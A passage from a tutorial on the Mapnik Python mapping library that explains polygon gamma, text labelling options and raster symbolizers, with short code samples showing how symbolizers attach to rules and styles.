There is one other PolygonSymbolizer attribute which you might find useful: gamma. The gamma value can be set to a number between 0.0 and 1.0, and it controls the amount of anti-aliasing used to draw the edge of the polygon; with the default gamma value of 1.0, the edges of the polygon will be fully anti-aliased. While this is usually a good thing, if you try to draw adjacent polygons with the same color, the anti-aliasing will cause the edges of the polygons to remain visible rather than combining them into a single larger area. By turning down the gamma slightly (for example, fill_symbol.gamma = 0.6), the edges between adjacent polygons will disappear.

Documentation for the PolygonSymbolizer class can be found at https://github.com/mapnik/mapnik/wiki/PolygonSymbolizer.

TextSymbolizer
The TextSymbolizer class is used to draw textual labels onto a map. This type of symbolizer can be used for Point, LineString, and Polygon geometries. The following example shows how a TextSymbolizer can be used:

text_symbol = mapnik.TextSymbolizer(mapnik.Expression("[label]"),
                                    "DejaVu Sans Book", 10,
                                    mapnik.Color("black"))

As you can see, four parameters are typically passed to the TextSymbolizer's initializer:

A mapnik.Expression object defining the text to be displayed. In this case, the text to be displayed will come from the label attribute in the datasource.
The name of the font to use for drawing the text. To see what fonts are available, type the following into the Python command line:

import mapnik
for font in mapnik.FontEngine.face_names():
    print font

The font size, measured in pixels.
The color to use to draw the text.

By default, the text will be drawn in the center of the geometry. This positioning of the label is called point placement. The TextSymbolizer allows you to change this to use what is called line placement, where the label will be drawn along the lines:

text_symbol.label_placement = mapnik.label_placement.LINE_PLACEMENT

This causes the label to be drawn along the length of a LineString geometry, or along the perimeter of a Polygon. The text won't be drawn at all for a Point geometry, since there are no lines within a point.
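For context, a symbolizer only takes effect once it is attached to a rule and a style, and the style is registered on the map. Rules and styles are not covered in this excerpt, so the following sketch is only a rough illustration of the usual wiring; the style name, map size, and label expression are assumptions:

import mapnik

# Build the symbolizers for a labelled road layer.
road_line = mapnik.LineSymbolizer(mapnik.Color("black"), 0.5)
road_label = mapnik.TextSymbolizer(mapnik.Expression("[label]"),
                                   "DejaVu Sans Book", 10,
                                   mapnik.Color("black"))
road_label.label_placement = mapnik.label_placement.LINE_PLACEMENT

# A rule groups symbolizers; a style groups rules.
rule = mapnik.Rule()
rule.symbols.append(road_line)
rule.symbols.append(road_label)

style = mapnik.Style()
style.rules.append(rule)

# Register the style on the map; a mapnik.Layer would then reference it
# by name via layer.styles.append("Roads").
m = mapnik.Map(800, 600)
m.append_style("Roads", style)

The same pattern applies to any of the symbolizers discussed here: a rule can hold several of them, and they are drawn in the order they were appended.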
The TextSymbolizer will normally just draw the label once, but you can tell the symbolizer to repeat the label if you wish by specifying a pixel gap to use between each label:

text_symbol.label_spacing = 30

By default, Mapnik is smart enough to stop labels from overlapping each other. If possible, it moves the label slightly to avoid an overlap, and then hides the label completely if it would still overlap. You can change this by setting the allow_overlap attribute:

text_symbol.allow_overlap = True

Finally, you can set a halo effect to draw a lighter-colored border around the text so that it is visible even against a dark background. For example:

text_symbol.halo_fill = mapnik.Color("white")
text_symbol.halo_radius = 1

There are many more labeling options, all of which are described at length in the documentation for the TextSymbolizer class. This can be found at https://github.com/mapnik/mapnik/wiki/TextSymbolizer.

RasterSymbolizer
The RasterSymbolizer class is used to draw raster-format data onto a map. This type of symbolizer is typically used in conjunction with a Raster or GDAL datasource. To create a new raster symbolizer, you instantiate a new mapnik.RasterSymbolizer object:

raster_symbol = mapnik.RasterSymbolizer()

The raster symbolizer will automatically draw any raster-format data provided by the map layer's datasource. This is often used to draw a basemap onto which the vector data is to be displayed. While there are some advanced options to control the way the raster data is displayed, in most cases, the only option you might be interested in is the opacity attribute. As usual, this sets the opacity of the displayed image, allowing you to layer semi-transparent raster images one on top of the other.

Documentation for the RasterSymbolizer can be found at https://github.com/mapnik/mapnik/wiki/RasterSymbolizer.

Summary
In this article, we covered the different types of symbolizers that are available in the Mapnik library. We also examined how symbolizers can be used to display spatial features, how the visible extent is used to control the portion of the map to be displayed, and how to render a map as an image file.

Resources for Article:
Further resources on this subject:
Python functions – Avoid repeating code [article]
Preparing to Build Your Own GIS Application [article]
Server Logs [article]